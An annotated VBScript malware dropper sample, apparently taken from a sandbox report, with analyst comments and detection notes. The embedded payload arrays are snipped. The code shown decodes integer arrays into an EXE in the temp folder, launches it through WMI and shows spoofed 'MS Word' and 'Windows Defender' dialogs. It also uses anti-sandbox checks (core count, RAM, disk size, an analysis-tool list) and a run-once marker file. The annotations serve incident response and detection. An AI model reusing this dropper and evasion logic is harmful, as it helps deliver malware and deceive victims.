- //full sample in https://app.any.run/tasks/c25c082c-7712-4e62-80f1-bdea4d1e6953/
- //and https://pastebin.com/c0bFqB83
- // block of arrays snipped
- .
- .
- .
- //this section renames the arrays from above
- // Each line aliases one of the snipped integer arrays under a second name.
- // pdjrgmIW later collects these aliases (typed with different letter casing,
- // which VBScript treats as the same identifiers) and feeds each one to the
- // decoder mlQnGb, so this block is just a renaming layer over the payload data.
- LTGogLwjFf = EaKtteX
- PzXVYC = gzHuJzgYUe
- MytMMIUj = uIabfRjRKH
- zqVwsMYFP = FDZOhyQaFl
- OfpYCQBz = kcmwdueszi
- RWULNJYfNU = GgUAbnaP
- RXlgQeJKi = ejESLAxKfy
- VjjkkfpdN = nsKSeZYg
- UfaCHF = WhDJjXxV
- ivWVxdXGk = rmHaGhbsPG
- usVQEC = JLxSdpu
- FBLqXG = JXrbOq
- hWKbQz = DUfaZDlzn
- vbZukXE = VWGjtr
- LejZgQG = ZyIuWe
- jZWTcsX = oIFfucVB
- IynXcPAt = iJLCLxqiGw
- lzlnlJB = VScSEX
- lHIOGj = XJJeOtWrna
- xlFtoy = ilMXhTB
- wXzVHoT = LxMJqmV
- LAUUMcmF = pzRBLxlK
- cYAEZdPp = OBsvvmqtd
- DkvTtrEhE = OqNQvYogYR
- rCpbGjwADJ = zTwBWt
- KEBybBm = ZtxvtAa
- DcxZoyI = ysLrBpUmf
- tsObzOtGhv = HDJYQH
- DbuGdDX = XJcHMjMOqt
- jdtFpc = oNwwEZh
- wQTFXgY = opvhAX
- pJEszL = rRunjXeE
- DmHcbP = ZSYcelKIU
- //decoding function using the CONST defined at bottom
- fUNctIOn mlQnGb(zaqIAdtayJ)
- // Decoder: every element of the array argument, minus 61, is taken as a
- // character code (ChrW) and appended; the function returns the decoded string.
- // The integer constants at the bottom of the script are the array elements,
- // e.g. Array(g5) with g5 = 176 decodes to ChrW(115) = "s".
- ZnjjgeFvDx = 0
- XzVYLFB = ""
- // "= <" appears to be intended as <= so that the last element (UBound) is included
- Do wHIlE ZnjjgeFvDx = < UBOUnd(zaqIAdtayJ)
- XzVYLFB = XzVYLFB + ChrW(zaqIAdtayJ(ZnjjgeFvDx) - 61)
- ZnjjgeFvDx = ZnjjgeFvDx + 1
- loOp
- mlQnGb = XzVYLFB
- enD fUNctIOn
- // Path helper: the argument is swapped (1 -> 2, anything else -> 1) before being
- // passed to FileSystemObject.GetSpecialFolder, where 2 is the TemporaryFolder and
- // 1 the SystemFolder. Every caller below passes 1, so they all receive %TEMP%
- // with a trailing backslash. IR note: the marker file and dropped EXE live there.
- fUNctIOn HNrrPohP(zaqIAdtayJ)
- if zaqIAdtayJ = 1 TheN
- zaqIAdtayJ = 2
- else
- zaqIAdtayJ = 1
- enD if
- IKEOHo = WScript.CReATeObjECT("Scripting.FileSystemObject").geTsPecIalFoLDEr(zaqIAdtayJ)
- HNrrPohP = CStr(IKEOHo) + "\"
- enD fUNctIOn
- // create/check marker file
- fUNctIOn VsSroV()
- // Run-once guard keyed on %TEMP%\kwaOcRHq: if the file exists the script quits,
- // otherwise it is created with the content "yvzklleh". IR artifact: this file
- // in the temp folder shows the script got past the timing checks at least once.
- DIM HFjKhoc
- set HFjKhoc = CReATeObjECT("Scripting.FileSystemObject")
- if (HFjKhoc.fIleeXisTS(HNrrPohP(1) + "kwaOcRHq")) TheN
- wscRipT.quIT
- else With HFjKhoc.createTextFile(HNrrPohP(1) + "kwaOcRHq")
- .Write("yvzklleh")
- .close
- enD With
- enD if
- enD fUNctIOn
- // decode/write payload from arrays above
- fUNctIOn pdjrgmIW()
- // Dropper: decodes every aliased array with mlQnGb into a text ADODB.Stream,
- // copies it through a second stream whose Charset is ISO-8859-1 (presumably so
- // that each decoded code unit 0-255 is written as a single byte) and saves the
- // result to %TEMP%\LbAeBeM.exe (2 = adSaveCreateOverWrite).
- // The ProgID is unquoted as transcribed here; the original most likely reads
- // "ADODB.Stream". Detection: wscript.exe writing a .exe into the temp folder.
- DIM duUZkQri
- DIM mAcAZSZ
- set duUZkQri = CReATeObjECT(ADODB.Stream)
- set mAcAZSZ = CReATeObjECT(ADODB.Stream)
- // Type 2 = adTypeText
- duUZkQri.Type = 2
- duUZkQri.OpEn()
- njEXypQQW = ARraY(LTgoGlwjFF, pzXVyc, mytmMiUJ, ZqvwsMyFp, ofpYcQbz, RWULNJyfNU, RxLgQeJKi, VjJKkfpDN, UFaChf, ivwvxDxGK, USVQec, FBlQXg, hWkbqz, vbZuKxe, lEjzGQG, jzWtcsX, IYnxCPAT, lzlnljB, lHIogJ, xlftOY, WxZVHOt, LaUUMCMF, cyAeZDpp, DkvTtrEhe, RcPBGJWadj, KebYbbM, DcxZOyi, TsOBzOtGhv, DbUGDDx, jdTFpC, WqTFXgy, pJESzL, dMhCbP)
- For Each File in njEXypQQW
- duUZkQri.wRitetExT mlQnGb(File)
- NeXT
- duUZkQri.Position = 0
- mAcAZSZ.Type = 2
- mAcAZSZ.Charset = "ISO-8859-1"
- mAcAZSZ.OpEn()
- duUZkQri.cOpYtO(mAcAZSZ)
- mAcAZSZ.saVetoFiLe HNrrPohP(1) + "LbAeBeM.exe", 2
- duUZkQri.close()
- mAcAZSZ.close()
- enD fUNctIOn
- // random message to slow analysis
- fUNctIOn vltBnKtEE()
- // Shows a system-modal error box with a spoofed "MS Word" title and measures how
- // long it stays open. mlQnGb(Array(g5)) decodes to "s" (g5 = 176; 176 - 61 = 115),
- // so DateDiff counts seconds: if the box is dismissed in under 2 seconds the
- // busy-wait NCnlcRd runs. The MsgBox return value itself is never used.
- // WScript.Network is unquoted as transcribed; the original most likely quotes it.
- xjLQFLXXrC = NOw()
- uYLfpH = CReATeObjECT(WScript.Network).UserName
- QFVdCzIzfc = mSgbox("User " + uYLfpH + "An unexpected error has occurred. You request cannot be processed at this time. Please try again later. (0x836505785)", vbSystemModal + vbExclamation, "MS Word")
- fpxSupp = NOw()
- if DATedIfF(mlQnGb(Array(g5)), xjLQFLXXrC, fpxSupp) < 2 TheN
- NCnlcRd
- enD if
- enD fUNctIOn
- // random message to slow analysis
- fUNctIOn vltBnKtEE2()
- // Same timing check as vltBnKtEE, but the box is an information message with a
- // spoofed "Windows Defender" title. mlQnGb(Array(g5)) again yields "s", so a box
- // closed in under 2 seconds triggers the busy-wait NCnlcRd. Return value unused.
- xjLQFLXXrC = NOw()
- uYLfpH = CReATeObjECT(WScript.Network).UserName
- QFVdCzIzfc = mSgbox("File 0x836505785 checked, no malicious activity detected! ", vbSystemModal + vbInformation, "Windows Defender")
- fpxSupp = NOw()
- if DATedIfF(mlQnGb(Array(g5)), xjLQFLXXrC, fpxSupp) < 2 TheN
- NCnlcRd
- enD if
- enD fUNctIOn
- // run payload
- fUNctIOn RlYBzEfO()
- // Launches the dropped %TEMP%\LbAeBeM.exe via WMI Win32_Process.Create;
- // processid is an undeclared variable that receives the new PID.
- // Detection: a process started this way has WmiPrvSE.exe as its parent rather
- // than wscript.exe, so parent/child rules keyed on wscript alone will miss it.
- set LQiSDvN = getOBjEct("winmgmts:Win32_Process")
- LQiSDvN.Create HNrrPohP(1) + "LbAeBeM.exe", null, null, processid
- enD fUNctIOn
- // Main sequence: run-once marker check, drop the payload, execute it.
- fUNctIOn hAtgPLDZwG()
- VsSroV
- pdjrgmIW
- RlYBzEfO
- enD fUNctIOn
- // wait function
- fUNctIOn NCnlcRd()
- // CPU-bound stall: counts from 61 up to 5046157 doing no useful work.
- // The quit branch inside the loop can never fire (the loop ends before the
- // counter reaches 5046157), and the +62 applied at 5045940 guarantees the final
- // equality test fails, so the recursive call is never taken and the assignment
- // to VoPyloUugTNSLHR is dead. Net effect is only a delay; it never aborts.
- ZnjjgeFvDx = 61
- XzVYLFB = 836505785
- Do wHIlE ZnjjgeFvDx < 5046157
- if (ZnjjgeFvDx = 5046157) TheN
- wscRipT.quIT
- else enD if
- if (ZnjjgeFvDx = 5045940) TheN
- XzVYLFB = XzVYLFB + 1+61
- else enD if
- ZnjjgeFvDx = ZnjjgeFvDx + 1
- loOp
- if (XzVYLFB = 836505785) TheN
- VoPyloUugTNSLHR = 76
- NCnlcRd
- enD if
- enD fUNctIOn
- // processor count check
- fUNctIOn oNVTre()
- // Flags hosts where any Win32_Processor instance reports fewer than 3 cores
- // and responds by running the stall twice; otherwise only a dead assignment.
- ECmYgVr = 0
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- // 48 = wbemFlagReturnImmediately + wbemFlagForwardOnly
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_Processor", , 48)
- For Each RUqTtIFO In maHiCdNgJ
- if RUqTtIFO.NumberOfCores < 3 TheN
- ECmYgVr = True
- enD if
- NeXT
- if ECmYgVr TheN
- NCnlcRd
- NCnlcRd
- else FzRVVeIxhUfRAbJRukeLZf = 73
- enD if
- enD fUNctIOn
- // anti-analysis checks
- fUNctIOn NtcpEnhq()
- EFfLttPZRuBmDOaxqXM = 17
- // List of analysis, debugging and sandbox tool executables. As transcribed the
- // assignment has no Array() wrapper, and the loop below queries Win32_Processor
- // (the CPU, not running processes) and compares its Name to these file names,
- // so as written the check appears never to match. Even on a match the only
- // reaction is the stall NCnlcRd; nothing here aborts the script.
- DmagdOrPy = "cis.exe", "cmdvirth.exe", "alive.exe", "filewatcherservice.exe", "ngvmsvc.exe", "sandboxierpcss.exe", "analyzer.exe", "fortitracer.exe", "nsverctl.exe", "sbiectrl.exe", "angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","cff explorer.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe", 
"qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","filemon.exe","netsniffer.exe","sandboxie.com","launch.exe")
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_Processor")
- For Each RUqTtIFO In maHiCdNgJ
- For Each GyIlWhxMD In DmagdOrPy
- if RUqTtIFO.Name = GyIlWhxMD TheN
- NCnlcRd
- enD if
- NeXT
- NeXT
- enD fUNctIOn
- // file count check
- fUNctIOn FTJdmYOm()
- // If the temp folder contains no files at all (presumably aimed at a pristine
- // analysis VM) the stall runs twice. This is the first check called at the
- // bottom of the script, so it runs before the marker file is created.
- if CReATeObjECT("Scripting.FileSystemObject").GetFolder(HNrrPohP(1)).Files.Count < 1 TheN
- NCnlcRd
- NCnlcRd
- else enD if
- enD fUNctIOn
- // memory size check
- fUNctIOn UvuuEE()
- // Sums TotalPhysicalMemory over Win32_ComputerSystem in MiB (1048576 bytes,
- // plus 1 per instance); under 1024 MiB the stall runs twice.
- // trQCYmYY is never initialised; VBScript evaluates the Empty start value as 0.
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_ComputerSystem")
- For Each RUqTtIFO In maHiCdNgJ
- trQCYmYY = trQCYmYY + Int((RUqTtIFO.TotalPhysicalMemory) / 1048576) + 1
- NeXT
- if trQCYmYY < 1024 TheN
- NCnlcRd
- NCnlcRd
- enD if
- enD fUNctIOn
- // disk size check
- fUNctIOn CBWYiVOXY()
- // Sums Size over every Win32_LogicalDisk in GiB (1073741824 bytes); under
- // 60 GiB in total the stall runs twice.
- // NOTE(review): a drive with no media reports a Null Size, which would presumably
- // turn the whole sum Null and make the comparison False (no stall) - confirm.
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_LogicalDisk")
- For Each RUqTtIFO In maHiCdNgJ
- trQCYmYY = trQCYmYY + Int(RUqTtIFO.Size / 1073741824)
- NeXT
- if trQCYmYY < 60 TheN
- NCnlcRd
- NCnlcRd
- enD if
- enD fUNctIOn
- // Entry sequence: the environment checks run first, then the drop-and-execute
- // routine. Every check reacts only by calling the busy-wait NCnlcRd, which never
- // quits, so none of them stops execution - they only add delay before
- // hAtgPLDZwG runs. The only early exit is the marker-file check inside VsSroV.
- FTJdmYOm
- vltBnKtEE2
- vltBnKtEE
- UvuuEE
- NtcpEnhq
- oNVTre
- CBWYiVOXY
- hAtgPLDZwG
- // Decoder key material: each constant is one element of the payload arrays;
- // mlQnGb subtracts 61 from it to recover the character (e.g. g5 = 176 -> "s").
- // Only the casing of the Const keyword varies between lines; VBScript
- // identifiers are case-insensitive, so the mixed case is obfuscation only.
- conST m8 = 262
- CONST mM8 = 511
- COnST O1 = 172
- cOnST u9 = 259
- coNst a8 = 264
- ConSt Aa8 = 302
- CoNST p6 = 185
- CONSt E1 = 93
- CoNSt W6 = 82
- cONSt wW6 = 287
- COnST n9 = 267
- cONst nn9 = 275
- ConSt v2 = 206
- CoNst G4 = 110
- COnsT Q9 = 311
- conSt Qq9 = 387
- CoNST H7 = 260
- cOnST u2 = 156
- coNsT uu2 = 227
- cONST W9 = 253
- cONSt Q4 = 191
- CONsT z7 = 308
- CoNsT I1 = 228
- coNsT ii1 = 244
- CONsT A5 = 305
- cONst v5 = 62
- cOnST x5 = 220
- ConST F3 = 151
- CONsT C8 = 125
- coNST D2 = 67
- cONST d8 = 313
- CoNSt u7 = 234
- conSt h6 = 75
- cOnST U = 83
- CoNSt uU = 267
- CONst r = 269
- CONST A4 = 229
- ConsT U4 = 118
- ConSt Y4 = 63
- CoNsT v = 271
- ConSt VV = 357
- cONst k8 = 95
- CoNST Kk8 = 222
- coNsT E5 = 266
- CONSt M3 = 294
- Const n4 = 71
- cONsT e6 = 224
- ConsT t5 = 265
- consT z8 = 235
- cONSt R6 = 291
- COnSt Y3 = 146
- ConST yY3 = 161
- ConSt B1 = 290
- CONSt v9 = 201
- cOnSt w2 = 158
- cOnSt ww2 = 255
- CONsT a2 = 226
- COnst c6 = 109
- cOnST Cc6 = 224
- cONSt V4 = 141
- coNST P8 = 104
- COnsT D4 = 66
- CoNSt dD4 = 190
- Const E = 200
- COnSt K1 = 131
- coNst kK1 = 356
- coNst t2 = 289
- coNSt x1 = 170
- consT v7 = 68
- CONST P2 = 108
- cONst w8 = 115
- ConsT wW8 = 149
- ConsT i4 = 77
- CONsT L1 = 214
- cOnSt L5 = 155
- conSt LL5 = 194
- CoNSt B5 = 149
- ConST z4 = 121
- cOnSt T6 = 78
- cONsT H1 = 198
- cONst J3 = 122
- coNST L4 = 227
- COnST F1 = 246
- coNst k6 = 307
- conST g = 256
- COnSt L = 89
- cONSt LL = 316
- coNSt I8 = 85
- COnsT j9 = 207
- COnSt B3 = 163
- CoNSt w4 = 177
- coNsT j2 = 232
- COnSt K5 = 184
- CONst i9 = 139
- CONst n1 = 252
- cONst S2 = 213
- cOnst l2 = 74
- COnSt Z6 = 270
- COnsT P3 = 132
- COnST p7 = 243
- cONsT l6 = 222
- cONst u6 = 152
- coNST s = 190
- coNst C7 = 102
- CoNSt Z1 = 76
- cONSt x9 = 134
- consT Y2 = 117
- CONst f8 = 106
- ConSt d6 = 208
- coNSt Dd6 = 416
- coNSt S7 = 196
- Const M4 = 241
- CoNsT j8 = 126
- coNSt jJ8 = 298
- cONst m6 = 188
- cOnST mM6 = 315
- Const A3 = 315
- cOnst L3 = 135
- CONsT y = 137
- coNsT W3 = 231
- cOnsT N8 = 178
- COnST l7 = 171
- coNsT X6 = 61
- CONSt xX6 = 269
- coNsT e4 = 94
- const d3 = 199
- conST dD3 = 273
- cONSt U3 = 129
- conST Uu3 = 242
- cOnsT p5 = 257
- cOnST X = 301
- cONsT H4 = 261
- cOnST hH4 = 503
- COnst M = 316
- consT G1 = 123
- ConsT W7 = 300
- CoNSt M7 = 87
- CoNST Mm7 = 130
- coNsT i6 = 80
- cOnST Q2 = 120
- CONst k2 = 258
- CoNst O7 = 127
- conST oo7 = 314
- cOnst U5 = 230
- cOnst r9 = 299
- CoNSt e8 = 169
- CoNst eE8 = 420
- cONSt S3 = 303
- COnSt g9 = 98
- cONSt gG9 = 269
- CoNsT t7 = 296
- coNst S6 = 279
- cONSt i = 73
- consT B7 = 275
- cOnst S4 = 145
- cONST B8 = 148
- coNsT B = 112
- COnST h8 = 143
- CoNsT p = 312
- ConST PP = 527
- CONSt t3 = 225
- cONSt A = 202
- conST y5 = 215
- CONSt P1 = 219
- COnST q1 = 119
- ConST h3 = 88
- coNSt n6 = 65
- CONST nN6 = 121
- ConSt H = 250
- CONSt d1 = 293
- coNst e2 = 205
- COnST Z3 = 297
- cONst n3 = 223
- cONsT J = 90
- ConSt Jj = 138
- ConST x2 = 278
- cOnsT O2 = 183
- CoNSt e7 = 255
- ConST eE7 = 475
- ConSt s5 = 99
- CONst SS5 = 313
- CoNsT P4 = 162
- cOnsT G3 = 111
- CONST GG3 = 203
- COnST O8 = 204
- consT J1 = 147
- CoNst F9 = 284
- cONSt C9 = 281
- ConST R3 = 240
- ConsT rr3 = 376
- COnST b9 = 292
- CoNsT q5 = 92
- cONst z = 276
- cONsT Zz = 410
- COnSt o9 = 142
- cONSt M5 = 157
- ConsT K7 = 210
- CONSt f5 = 179
- CONst N5 = 166
- coNST nN5 = 358
- const a9 = 100
- COnst s8 = 209
- CONSt C5 = 124
- cONsT r2 = 306
- coNst R1 = 298
- CoNSt I2 = 154
- coNsT Q = 263
- COnSt Qq = 402
- coNst x4 = 239
- CONSt O4 = 251
- cOnst Oo4 = 365
- cONsT r7 = 114
- Const h5 = 168
- CoNST x8 = 72
- CoNst B2 = 153
- const Z5 = 309
- COnsT U8 = 81
- CoNST k9 = 193
- const I3 = 138
- COnsT U1 = 314
- CONST X3 = 195
- cOnST P9 = 160
- CONst A6 = 159
- conSt k4 = 244
- CONSt KK4 = 466
- cONsT v1 = 254
- CoNsT H2 = 288
- ConST HH2 = 482
- cONst v6 = 180
- cOnST F6 = 212
- conST Ff6 = 311
- COnsT F2 = 64
- CoNST v3 = 133
- conST n = 295
- CoNsT nn = 391
- cONsT A1 = 97
- coNst AA1 = 126
- COnsT o = 140
- cONST d5 = 113
- COnSt b4 = 274
- COnSt bb4 = 337
- cONSt W = 247
- ConsT o5 = 101
- cONST n7 = 174
- COnST G8 = 286
- COnsT Gg8 = 471
- coNSt Y1 = 280
- conST F = 79
- ConSt e9 = 70
- CONsT o3 = 272
- CONST Q6 = 161
- CoNSt QQ6 = 238
- cONsT J5 = 211
- CONST i7 = 233
- CONSt Z9 = 216
- ConsT h9 = 283
- const W5 = 186
- cOnST M2 = 173
- ConSt D7 = 221
- cOnST F4 = 187
- coNsT V8 = 203
- consT z2 = 182
- coNST Zz2 = 381
- ConSt F7 = 302
- cONST X7 = 150
- cONSt R5 = 304
- CoNsT C3 = 287
- ConST T1 = 237
- coNst q8 = 285
- CONst g5 = 176
- cONST Gg5 = 252
- conST Q7 = 69
- cOnsT qq7 = 95
- cONSt S1 = 189
- ConsT t8 = 236
- conST TT8 = 333
- CoNst J4 = 167
- COnsT e3 = 128
- CoNst Ee3 = 317
- cONST B6 = 165
- Const O6 = 181
- CONST J7 = 238
- ConSt jJ7 = 238
- CoNst r8 = 282
- cONsT C2 = 84
- ConsT S9 = 273
- CONST l8 = 136
- Const C1 = 175
- cOnsT CC1 = 303
- cONst g6 = 194
- CONST M1 = 217
- CONSt w1 = 103
- CoNst a7 = 192
- COnSt D9 = 144
- COnsT k = 310
- Const G7 = 105
- coNsT C = 197
- Const M9 = 249
- CONST r4 = 245
- cONSt d = 107
- ConSt dD = 286
- consT k3 = 86
- CONST J6 = 242
- CoNSt t9 = 130
- conSt tT9 = 217
- const q3 = 164
- coNsT T4 = 268
- cOnSt g2 = 277
- COnsT C4 = 248
- ConsT i5 = 96
- cONst L9 = 218
- coNSt n2 = 91
- cOnsT t = 116